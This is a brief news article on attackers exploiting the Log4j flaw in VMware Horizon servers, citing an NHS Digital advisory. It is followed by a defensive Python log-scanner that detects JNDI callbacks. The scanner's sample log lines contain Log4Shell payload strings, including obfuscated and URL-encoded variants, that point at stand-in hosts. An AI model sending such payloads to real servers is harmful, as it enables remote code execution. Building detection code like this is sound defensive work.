Attackers Hitting VMware Horizon Servers With Log4j Exploits


The warning comes almost exactly one month after the first disclosure of a Log4j remote code execution vulnerability that threatens major damage on the internet and heightens the urgency for enterprise defenders to find and fix the issue.

According to an advisory from NHS Digital, attackers are exploiting the critical vulnerability in the Apache Tomcat service embedded within VMware Horizon.

The NHS Digital team believes the attacks are being used to establish persistence within affected networks and noted that the attack likely consists of a reconnaissance phase, where the attacker uses the Java Naming and Directory Interface (JNDI) via Log4Shell payloads to call back to malicious infrastructure.
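A defender-side way to hunt for the JNDI callback described above in web access logs, as an added example that is not taken from the NHS Digital advisory. It goes beyond the article by also collapsing nested Log4j lookups and URL encoding before matching; the log lines, hostnames and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Innermost ${...} groups (no nested "${" inside), e.g. ${lower:j} or ${::-d}
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A resolved JNDI lookup: ${jndi:<scheme>://<host>...}
_JNDI = re.compile(r"\$\{jndi:([a-z]+):/{1,2}([^/}\s:]+)", re.I)

def _resolve(m):
    body = m.group(1)
    if body.lower().startswith("jndi:"):
        return m.group(0)                 # keep the lookup we are hunting for
    if ":-" in body:
        return body.split(":-", 1)[1]     # ${env:X:-j} / ${::-j} -> default "j"
    prefix, _, rest = body.partition(":")
    if prefix.lower() in ("lower", "upper"):
        return rest                       # ${lower:j} -> "j"
    return ""                             # other lookups: value unknown offline

def normalize(text, max_rounds=5):
    """URL-decode and collapse nested lookups until the text stops changing."""
    for _ in range(max_rounds):
        new = _INNER.sub(_resolve, unquote(text))
        if new == text:
            break
        text = new
    return text

def jndi_callbacks(line):
    """Return (scheme, host) pairs for every JNDI lookup found in a log line."""
    return [(s.lower(), h.lower()) for s, h in _JNDI.findall(normalize(line))]

# Constructed sample access-log lines (not taken from any real incident)
SAMPLE_LOG = [
    '10.0.0.5 - - [07/Jan/2022:10:01:02 +0000] "GET /portal/info.jsp HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [07/Jan/2022:10:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://callback.example.invalid:1389/a}"',
    '10.0.0.7 - - [07/Jan/2022:10:03:40 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}n${::-d}i:${lower:rmi}://cb2.example.invalid/x}"',
    '10.0.0.8 - - [07/Jan/2022:10:04:00 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fcb3.example.invalid%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
]

def scan(lines):
    """Map 1-based line numbers to the callback hosts seen on that line."""
    hits = {}
    for n, line in enumerate(lines, 1):
        found = jndi_callbacks(line)
        if found:
            hits[n] = found
    return hits
```

The hosts returned by `scan` are the values to pivot on in DNS and egress firewall logs, since a matching outbound connection from the server indicates the lookup was actually evaluated.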